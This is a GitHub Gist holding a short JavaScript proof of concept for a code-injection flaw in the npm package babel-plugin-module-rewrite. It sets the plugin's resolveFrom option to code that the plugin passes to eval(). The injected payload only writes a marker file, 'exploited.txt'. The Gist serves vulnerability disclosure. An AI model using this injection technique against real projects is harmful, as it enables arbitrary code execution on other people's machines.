Last active
October 29, 2023 12:16
-
-
Save mcoimbra/7ad3a10e36a2762b1c53d3dbe29a889c to your computer and use it in GitHub Desktop.
Package babel-plugin-module-rewrite: The babel-plugin-module-rewrite package enables command injection into the eval() function by appropriately setting the function parameters as shown in this example.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('babel-plugin-module-rewrite'); | |
const _ref2 = { | |
types: { | |
isIdentifier: function() { return true; }, | |
isMemberExpression: function() {} | |
} | |
} | |
const a = 1; | |
const b = 2; | |
const res = pkg.default(_ref2, a, b); | |
const nodePath = { | |
node: { | |
callee: { | |
object: '' | |
}, | |
arguments: [{ type: 'StringLiteral'}] | |
} | |
}; | |
/* | |
* 'state.opts.resolveFrom' contains the code that will be passed to eval. | |
* A file 'exploited.txt' will be created in this example. | |
*/ | |
const state = { | |
opts: {resolveFrom: `require('fs').writeFileSync('exploited.txt','');['./']`}, | |
file: { | |
opts: { | |
filename: 'babel-plugin-module-rewrite-0.2.0_poc.js' | |
} | |
} | |
} | |
res.visitor.CallExpression.exit(nodePath, state); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment